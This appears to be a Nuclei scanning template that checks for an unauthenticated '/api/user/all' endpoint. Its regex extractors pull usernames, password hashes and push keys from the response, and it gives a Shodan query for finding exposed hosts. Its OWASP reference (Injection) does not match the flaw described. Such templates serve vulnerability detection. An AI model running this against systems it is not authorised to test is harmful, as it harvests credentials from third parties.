id: unauthorized-user-info-leak

info:
  name: Unauthorized User Information Leak
  author: jiangwen
  severity: high
  description: |
    The /api/user/all endpoint returns sensitive user information without proper authentication,
    including usernames, password hashes, push keys and role information.
  reference:
    - https://owasp.org/www-project-top-ten/2017/A1_2017-Injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200-Information-Exposure
  metadata:
    max-request: 1
    shodan-query: title:"user" port:18080
  tags: exposure,leak,unauth,api

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/user/all"
    
    headers:
      Host: "{{Hostname}}"
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
      Accept: "*/*"
      Accept-Charset: utf-8
      Accept-Encoding: gzip, deflate

    matchers:
      - type: word
        part: body
        words:
          - '"code":0'
          - '"username"'
          - '"password"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - '"username":"([^"]+)"'
          - '"password":"([^"]+)"'
          - '"pushKey":"([^"]+)"'